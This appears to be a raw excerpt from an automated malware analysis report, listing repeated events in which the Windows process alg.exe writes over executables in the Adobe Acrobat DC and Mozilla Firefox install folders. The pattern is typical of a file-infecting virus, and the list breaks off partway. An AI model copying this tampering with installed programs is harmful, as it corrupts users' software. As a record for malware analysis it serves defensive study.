                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
